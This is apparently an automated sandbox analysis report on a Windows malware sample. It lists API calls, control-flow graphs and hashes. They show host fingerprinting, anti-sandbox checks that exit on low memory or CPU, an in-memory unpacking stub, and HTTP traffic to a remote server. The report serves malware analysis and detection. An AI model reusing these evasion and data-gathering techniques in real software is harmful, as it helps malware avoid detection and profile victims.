4158d3-415948 call 41a740 * 2 call 401590 call 4152c0 call 41a8a0 call 41a800 call 41aad0 StrCmpCA 1189->1196 1197 41587b-4158ce call 41a820 call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1189->1197 1219 415a16-415a21 Sleep 1190->1219 1220 415a28-415a91 call 41a8a0 call 41a820 * 2 call 401670 call 41a800 * 4 call 416560 call 401550 1190->1220 1196->1190 1295 41594a-41598a call 41a7a0 call 401590 call 4151f0 call 41a8a0 call 41a800 1196->1295 1197->1190 1219->1127 1220->1290 1266->1163 1295->1190
                                                        APIs
                                                          • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,02EB5D28,?,0042110C,?,00000000), ref: 0041A82B
                                                          • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415644
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004156A1
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415857
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 004151F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                          • Part of subcall function 004152C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                          • Part of subcall function 004152C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 00415383
                                                          • Part of subcall function 004152C0: strtok.MSVCRT(00000000,?), ref: 0041539E
                                                          • Part of subcall function 004152C0: lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041578B
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415940
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415A0C
                                                        • Sleep.KERNEL32(0000EA60), ref: 00415A1B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpylstrlen$Sleepstrtok
                                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                        • API String ID: 3630751533-2791005934
                                                        • Opcode ID: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                        • Instruction ID: 0baa471f6470c30cedeccf0ca5f41b7a1b3666a88d5ff2061c329f06e4daefd3
                                                        • Opcode Fuzzy Hash: 57d063fc9ed83c1e53da0e14c22364a0aa576905cfee3b85b0d3c6812f09564c
                                                        • Instruction Fuzzy Hash: 5BE18675910104AACB04FBB1DD52EED733DAF54314F50812EB406660D1EF3CAB9ACBAA

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1322 417500-41754a GetWindowsDirectoryA 1323 417553-4175c7 GetVolumeInformationA call 418d00 * 3 1322->1323 1324 41754c 1322->1324 1331 4175d8-4175df 1323->1331 1324->1323 1332 4175e1-4175fa call 418d00 1331->1332 1333 4175fc-417617 GetProcessHeap HeapAlloc 1331->1333 1332->1331 1335 417619-417626 call 41a740 1333->1335 1336 417628-417658 wsprintfA call 41a740 1333->1336 1343 41767e-41768e 1335->1343 1336->1343
                                                        APIs
                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00417542
                                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041757F
                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417603
                                                        • HeapAlloc.KERNEL32(00000000), ref: 0041760A
                                                        • wsprintfA.USER32 ref: 00417640
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                        • String ID: :$C$\
                                                        • API String ID: 3790021787-3809124531
                                                        • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction ID: 2fa5a76c25c4840d12821100fc964cf287d391274576238511e757cc0c078ff1
                                                        • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                        • Instruction Fuzzy Hash: BF41A2B5D44248ABDB10DF94DC45BEEBBB9EF08714F10019DF50967280D778AA84CBA9

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1344 2cf003c-2cf0047 1345 2cf004c-2cf0263 call 2cf0a3f call 2cf0e0f call 2cf0d90 VirtualAlloc 1344->1345 1346 2cf0049 1344->1346 1361 2cf028b-2cf0292 1345->1361 1362 2cf0265-2cf0289 call 2cf0a69 1345->1362 1346->1345 1364 2cf02a1-2cf02b0 1361->1364 1366 2cf02ce-2cf03c2 VirtualProtect call 2cf0cce call 2cf0ce7 1362->1366 1364->1366 1367 2cf02b2-2cf02cc 1364->1367 1373 2cf03d1-2cf03e0 1366->1373 1367->1364 1374 2cf0439-2cf04b8 VirtualFree 1373->1374 1375 2cf03e2-2cf0437 call 2cf0ce7 1373->1375 1377 2cf04be-2cf04cd 1374->1377 1378 2cf05f4-2cf05fe 1374->1378 1375->1373 1380 2cf04d3-2cf04dd 1377->1380 1381 2cf077f-2cf0789 1378->1381 1382 2cf0604-2cf060d 1378->1382 1380->1378 1386 2cf04e3-2cf0505 LoadLibraryA 1380->1386 1384 2cf078b-2cf07a3 1381->1384 1385 2cf07a6-2cf07b0 1381->1385 1382->1381 1387 2cf0613-2cf0637 1382->1387 1384->1385 1388 2cf086e-2cf08be LoadLibraryA 1385->1388 1389 2cf07b6-2cf07cb 1385->1389 1390 2cf0517-2cf0520 1386->1390 1391 2cf0507-2cf0515 1386->1391 1392 2cf063e-2cf0648 1387->1392 1396 2cf08c7-2cf08f9 1388->1396 1393 2cf07d2-2cf07d5 1389->1393 1394 2cf0526-2cf0547 1390->1394 1391->1394 1392->1381 1395 2cf064e-2cf065a 1392->1395 1397 2cf07d7-2cf07e0 1393->1397 1398 2cf0824-2cf0833 1393->1398 1399 2cf054d-2cf0550 1394->1399 1395->1381 1400 2cf0660-2cf066a 1395->1400 1402 2cf08fb-2cf0901 1396->1402 1403 2cf0902-2cf091d 1396->1403 1404 2cf07e4-2cf0822 1397->1404 1405 2cf07e2 1397->1405 1401 2cf0839-2cf083c 1398->1401 1406 2cf0556-2cf056b 1399->1406 1407 2cf05e0-2cf05ef 1399->1407 1408 2cf067a-2cf0689 1400->1408 1401->1388 1409 2cf083e-2cf0847 1401->1409 1402->1403 1404->1393 1405->1398 1412 2cf056f-2cf057a 1406->1412 1413 2cf056d 1406->1413 1407->1380 1410 2cf068f-2cf06b2 1408->1410 1411 2cf0750-2cf077a 1408->1411 1416 2cf084b-2cf086c 1409->1416 1417 2cf0849 1409->1417 1418 2cf06ef-2cf06fc 1410->1418 1419 2cf06b4-2cf06ed 1410->1419 1411->1392 1414 2cf057c-2cf0599 1412->1414 1415 2cf059b-2cf05bb 1412->1415 1413->1407 1427 2cf05bd-2cf05db 1414->1427 1415->1427 1416->1401 1417->1388 1421 2cf06fe-2cf0748 1418->1421 1422 2cf074b 1418->1422 1419->1418 1421->1422 1422->1408 1427->1399
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 02CF024D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574689759.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_2cf0000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID: cess$kernel32.dll
                                                        • API String ID: 4275171209-1230238691
                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction ID: f52d848a7eb621d3bcf27de12283cb4e466daf3c2a9a7caa30bfd242752cbc5a
                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                        • Instruction Fuzzy Hash: 83525B74A01229DFDBA4CF58C984BACBBB1BF09314F1480D9E54DAB356DB30AA85DF14

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E87DD0), ref: 004198A1
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E87DE8), ref: 004198BA
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E87F38), ref: 004198D2
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E87EF0), ref: 004198EA
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E87E90), ref: 00419903
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02EB5D18), ref: 0041991B
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E828D8), ref: 00419933
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E82878), ref: 0041994C
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E87E78), ref: 00419964
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E87EA8), ref: 0041997C
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E87F20), ref: 00419995
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E87EC0), ref: 004199AD
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E826B8), ref: 004199C5
                                                          • Part of subcall function 00419860: GetProcAddress.KERNEL32(75550000,02E87ED8), ref: 004199DE
                                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                          • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                          • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                                                          • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                          • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                          • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                          • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                          • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                          • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                          • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                          • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                          • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                                                        • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                                                          • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                          • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                                                          • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                                                          • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                                                          • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                          • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                          • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02EB5D28,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                        • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                        • Sleep.KERNEL32(00001770), ref: 00416B04
                                                        • CloseHandle.KERNEL32(?,00000000,?,02EB5D28,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                        • ExitProcess.KERNEL32 ref: 00416B22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                        • String ID:
                                                        • API String ID: 3511611419-0
                                                        • Opcode ID: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                        • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                                                        • Opcode Fuzzy Hash: 69548e9f7b0c997070e8e7643a6d484cc2a1657e3649f1ee2c31899339907b6b
                                                        • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                                                        Control-flow Graph

                                                        APIs
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                        • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                        • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ??2@$CrackInternetlstrlen
                                                        • String ID: <
                                                        • API String ID: 1683549937-4251816714
                                                        • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                        • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                                                        • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                                                        • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1499 401281-401285 1496->1499 1497->1499 1501 401287 1499->1501 1502 40129a-40129d 1499->1502 1504 401292-401294 ExitProcess 1501->1504 1505 401289-401290 1501->1505 1505->1502 1505->1504
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                        • __aulldiv.LIBCMT ref: 00401258
                                                        • __aulldiv.LIBCMT ref: 00401266
                                                        • ExitProcess.KERNEL32 ref: 00401294
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                        • String ID: @
                                                        • API String ID: 3404098578-2766056989
                                                        • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                                                        • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                        • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1516 416af5-416b04 CloseHandle Sleep 1510->1516 1517 416ad9-416af1 call 41aad0 CreateEventA 1510->1517 1516->1508 1517->1511
                                                        APIs
                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02EB5D28,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                                                        • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                                                        • Sleep.KERNEL32(00001770), ref: 00416B04
                                                        • CloseHandle.KERNEL32(?,00000000,?,02EB5D28,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                                                        • ExitProcess.KERNEL32 ref: 00416B22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                        • String ID:
                                                        • API String ID: 941982115-0
                                                        • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                        • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                                                        • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                                                        • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                                                        APIs
                                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                          • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                          • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,02EBB178), ref: 00406303
                                                          • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                          • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,02EBB9B8,00000000,00000000,00400100,00000000), ref: 00406385
                                                          • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                          • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                        • String ID: ERROR$ERROR
                                                        • API String ID: 3287882509-2579291623
                                                        • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                        • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                                                        • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                                                        • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                                                        • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocComputerNameProcess
                                                        • String ID:
                                                        • API String ID: 4203777966-0
                                                        • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                        • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                                                        • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                                                        • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                                                        • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                                                        • ExitProcess.KERNEL32 ref: 00401143
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1573308248.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1573308248.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1573308248.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_716b3c89802c1713871667444720e62f3fc064c9910a1.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$AllocCurrentExitNumaVirtual
                                                        • String ID:
                                                        • API String ID: 1103761159-0
                                                        • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                        • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                                                        • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                                                        • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                                                        APIs
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E89E06
                                                        • Module32First.KERNEL32(00000000,00000224), ref: 02E89E26
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1574915404.0000000002E89000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E89000, based on PE: false
                                                        Joe Sandbox IDA Plugin
